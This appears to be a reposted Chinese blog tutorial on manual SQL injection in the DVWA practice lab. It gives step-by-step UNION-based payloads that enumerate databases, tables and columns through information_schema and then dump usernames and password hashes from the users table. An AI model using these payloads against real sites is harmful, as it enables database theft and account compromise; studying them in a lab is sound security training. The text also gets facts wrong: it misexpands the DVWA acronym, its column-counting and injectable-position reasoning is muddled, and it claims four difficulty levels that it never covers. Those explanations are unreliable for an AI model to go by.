博客
关于我
DVWA--SQL Injection(非盲注)--四个级别
阅读量:209 次
发布时间:2019-02-28

本文共 2372 字,大约阅读时间需要 7 分钟。

SQL 注入测试与渗透:DVWA 框架下的手动注入流程

SQL 注入是一种Web安全中的常见漏洞,攻击者通过向应用程序中输入恶意的SQL语句,破坏现有的查询逻辑,从而执行恶意操作。SQL注入漏洞能够导致数据库信息泄露、数据篡改甚至整个数据库的“脱库”,因此被广泛认为是Web安全中的高风险问题。

本文将基于DVWA( Dependency-Conflict Vulnerability Assessment )框架,逐步讲解手动SQL注入测试的过程,涵盖从低级别到高级别的测试方法,以及如何利用这些漏洞进行数据库渗透。


1. 判断注入类型:数字型 vs 字符型

在手动SQL注入中,首先需要判断注入类型,即注入是基于数字型还是字符型。以下是一些常见的测试方法:

  • 数字型注入

    • 输入 1,页面正常返回,表明注入点可能存在数字型漏洞。
    • 输入 1 and 1=2,页面异常或返回错误,说明可能存在数字型注入。
    • 输入 1' and '1'='1,页面异常或返回错误,说明字符型注入可能存在。
  • 字符型注入

    • 输入 1' and '1'='1,页面正常返回,表明注入点可能存在字符型漏洞。
    • 输入 1' and '1'='2,页面异常或返回错误,说明字符型注入可能存在。

通过以上测试,可以初步判断注入类型,并为后续操作做好准备。


2. 猜解字段数量

接下来需要确定SQL查询语句中所涉及的字段数量。可以通过以下方法进行测试:

  • 使用 ORDER BY

    • 输入 1 order by 1,页面正常返回,说明至少有一个字段。
    • 输入 1 order by 2,页面正常返回,说明至少有两个字段。
    • 输入 1 order by 3,页面异常返回,说明字段数量小于3。
  • 使用 UNION SELECT

    • 输入 1 union select 1,页面异常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,页面正常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,3,页面异常返回,说明字段数量小于3。

通过以上方法,可以准确判断出SQL查询语句中涉及的字段数量,为后续注入操作提供依据。


3. 确定可注入字段位置

接下来需要确定哪些字段位置可以进行注入利用。可以通过以下方法实现:

  • 使用 UNION SELECT
    • 输入 1' and 1=2 union select 1,2,页面正常返回,说明两个字段位置都可以注入利用。
    • 输入 1' and 1=2 union select 1,3,页面异常返回,说明第三个字段位置不可注入。

通过观察返回的数据,可以判断哪些字段位置可以利用注入点,进而制定后续操作策略。


4. 查询当前使用的数据库

在SQL注入过程中,通常需要获取当前使用的数据库信息。可以通过以下方法实现:

  • 使用 UNION SELECT database()

    • 输入 1' and 1=2 union select database(),页面正常返回,显示当前数据库名称(如 dvwa)。
  • 查询所有数据库

    • 输入 1' and 1=2 union select table_schema from information_schema.tables,页面正常返回,列出所有数据库名称。

通过以上方法,可以获取当前使用的数据库信息,为后续操作提供重要数据支持。


5. 查询数据库中的表

在掌握数据库名称后,需要查询数据库中的所有表信息。可以通过以下方法实现:

  • 获取当前数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables where table_schema=database(),页面正常返回,列出当前数据库中的所有表名称。
  • 获取所有数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables,页面正常返回,列出所有数据库中的表名称。

通过以上方法,可以获取目标数据库中的表信息,为后续操作提供数据支持。


6. 查询表中的字段

在掌握表名称后,需要查询表中的字段信息。可以通过以下方法实现:

  • 获取当前表中的字段
    • 输入 1' and 1=2 union select column_name from information_schema.columns where table_name='users',页面正常返回,列出指定表中的字段名称。

通过以上方法,可以获取表中的字段信息,为后续注入操作提供重要数据支持。


7. 查询字段的具体值

在掌握字段名称后,需要查询字段的具体值。可以通过以下方法实现:

  • 获取用户信息

    • 输入 1' and 1=2 union select user_id, first_name, last_name from users,页面正常返回,列出用户信息。
  • 获取密码信息

    • 输入 1' and 1=2 union select user_id, password from users,页面正常返回,列出用户账号和密码。

通过以上方法,可以获取字段的具体值,完成数据库渗透。


8. 总结与建议

通过以上步骤,可以逐步完成SQL注入测试的整个流程。需要注意以下几点:

  • 测试环境的准备:确保测试环境的安全性,避免对生产环境造成影响。
  • 工具的选择:手动注入工具的选择可以根据具体需求进行调整,如使用 sqlmap 等自动化工具。
  • 防护措施:了解并遵守Web应用的安全最佳实践,减少SQL注入漏洞的发生概率。
  • 通过以上方法,可以在DVWA框架中安全地进行SQL注入测试,并掌握数据库渗透的关键技术。

    转载地址:http://shqi.baihongyu.com/

    你可能感兴趣的文章
    NS图绘制工具推荐
    查看>>
    NT AUTHORITY\NETWORK SERVICE 权限问题
    查看>>
    NT symbols are incorrect, please fix symbols
    查看>>
    ntelliJ IDEA 报错:找不到包或者找不到符号
    查看>>
    NTFS文件权限管理实战
    查看>>
    ntko web firefox跨浏览器插件_深度比较:2019年6个最好的跨浏览器测试工具
    查看>>
    ntko文件存取错误_苹果推送 macOS 10.15.4:iCloud 云盘文件夹共享终于来了
    查看>>
    ntp server 用法小结
    查看>>
    ntpdate 通过外网同步时间
    查看>>
    ntpdate同步配置文件调整详解
    查看>>
    NTPD使用/etc/ntp.conf配置时钟同步详解
    查看>>
    NTP及Chrony时间同步服务设置
    查看>>
    NTP服务器
    查看>>
    NTP配置
    查看>>
    NUC1077 Humble Numbers【数学计算+打表】
    查看>>
    NuGet Gallery 开源项目快速入门指南
    查看>>
    NuGet(微软.NET开发平台的软件包管理工具)在VisualStudio中的安装的使用
    查看>>
    nuget.org 无法加载源 https://api.nuget.org/v3/index.json 的服务索引
    查看>>
    Nuget~管理自己的包包
    查看>>
    NuGet学习笔记001---了解使用NuGet给net快速获取引用
    查看>>